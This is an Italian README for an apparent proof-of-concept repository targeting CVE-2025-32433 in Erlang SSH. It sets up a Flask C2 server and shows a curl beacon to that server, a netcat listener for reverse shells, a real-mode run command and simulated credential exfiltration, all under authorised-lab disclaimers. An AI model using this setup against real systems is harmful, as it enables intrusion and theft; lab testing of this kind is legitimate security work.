
Proof-of-concept exploit per CVE-2025-32433 con modalità di attacco simulate e reali, incluso un server C2 basato su Flask per callback di reverse shell e simulazione di post-exploitation.
Questo repository contiene codice che dimostra una vera CVE (CVE-2025-32433).
Usalo solo in ambienti in cui hai esplicita autorizzazione.
Non testare mai questo exploit contro sistemi che non possiedi o gestisci.
L'uso non autorizzato è illegale, non etico e dannoso per la comunità della cybersecurity.
POC simulato e reale per CVE-2025-32433
Il mio amico Chocapikk mi ha mostrato questo PoC trovato erling_cve.py, ero incuriosito e volevo testarlo in un ambiente sicuro.
Hai due scelte con questo repo. Lo script simulato sicuro e il sistema che descrivo di seguito.
Oppure puoi utilizzare il vero erling_cve.py (in modo etico, con cautela e solo su reti su cui hai il permesso di testare)
Prima di usare questo strumento per testare o eseguire un exploit reale, dai un'occhiata al mio amico m0usemm0use e al suo script Python per trovare target vulnerabili a CVE-2025-32433!!!!
https://github.com/m0usem0use/erl_mouse
Versione SIMULATA dell'exploit per CVE-2025-32433
Costruisci un C2 basato su Python Flask: potente per callback di bot o reverse shell.
Esegui questo script di configurazione sul server C2
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (incolla lo script c2_server, modifica se necessario)
esegui
python3 c2_server.py
I bot (o gli script di test) possono eseguire curl verso home in questo modo
curl -X POST http://:8080/report -d "Bot is online"
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Crea un ambiente virtuale Python
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
nano test_callback.py (incolla lo script test_callback e modifica se necessario)
esegui il callback
python3 test_callback.py
Ora hai ufficialmente
Un venv funzionante
Un C2 cloud live
Un'iniezione di callback funzionale
Si connette alla porta 22 di un IP target
Invia una stringa di versione SSH falsa
Invia un pacchetto costruito (probabilmente per attivare una vulnerabilità — fingendo di abusare di qualcosa come il gestore SSH non documentato di Erlang o un buffer overflow)
Attiva una reverse shell verso l'IP dell'attaccante
Simula post-exploitation eseguendo comandi come whoami, uname e una finta "esfiltrazione di credenziali" verso /tmp/exfil.log
Prenderemo il nostro PoC simile a Erlang e lo
Renderemo funzionante all'interno del venv di Kali
Lo collegheremo per segnalare al nostro C2 cloud quando l'"attacco" viene eseguito
Lo eseguiremo in modo etico e sicuro all'interno di un laboratorio controllato
Lo osserveremo generare /tmp/exfil.log per simulare dati rubati
dalla macchina Kali
nano poc_erlang_test.py
-incolla poc_erlang_test.py e modifica se necessario
in un nuovo terminale esegui
nc -lvnp 4444
esegui il PoC
python poc_erlang_test.py --real